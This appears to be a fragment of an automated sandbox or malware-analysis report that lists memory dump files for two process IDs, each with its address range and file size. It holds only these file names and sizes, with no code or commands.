    • memory/3452-23-0x0000000007BA0000-0x0000000007BC2000-memory.dmp

      Filesize

      136KB

    • memory/3452-24-0x0000000008C10000-0x00000000091B4000-memory.dmp

      Filesize

      5.6MB

    • memory/3452-7-0x0000000006340000-0x00000000063A6000-memory.dmp

      Filesize

      408KB

    • memory/3452-5-0x00000000062D0000-0x0000000006336000-memory.dmp

      Filesize

      408KB

    • memory/3452-22-0x0000000007C00000-0x0000000007C96000-memory.dmp

      Filesize

      600KB

    • memory/3452-32-0x0000000070D50000-0x0000000071500000-memory.dmp

      Filesize

      7.7MB

    • memory/3452-26-0x0000000070D5E000-0x0000000070D5F000-memory.dmp

      Filesize

      4KB

    • memory/3452-20-0x0000000007FE0000-0x000000000865A000-memory.dmp

      Filesize

      6.5MB

    • memory/3452-4-0x0000000005AE0000-0x0000000005B02000-memory.dmp

      Filesize

      136KB

    • memory/3452-3-0x0000000005BB0000-0x00000000061D8000-memory.dmp

      Filesize

      6.2MB

    • memory/3452-18-0x0000000006990000-0x00000000069AE000-memory.dmp

      Filesize

      120KB

    • memory/3452-1-0x0000000003070000-0x00000000030A6000-memory.dmp

      Filesize

      216KB

    • memory/3452-17-0x00000000063B0000-0x0000000006704000-memory.dmp

      Filesize

      3.3MB

    • memory/3452-0-0x0000000070D5E000-0x0000000070D5F000-memory.dmp

      Filesize

      4KB

    • memory/3452-27-0x0000000070D50000-0x0000000071500000-memory.dmp

      Filesize

      7.7MB

    • memory/3452-6-0x0000000070D50000-0x0000000071500000-memory.dmp

      Filesize

      7.7MB

    • memory/4108-33-0x00000129F1570000-0x00000129F1592000-memory.dmp

      Filesize

      136KB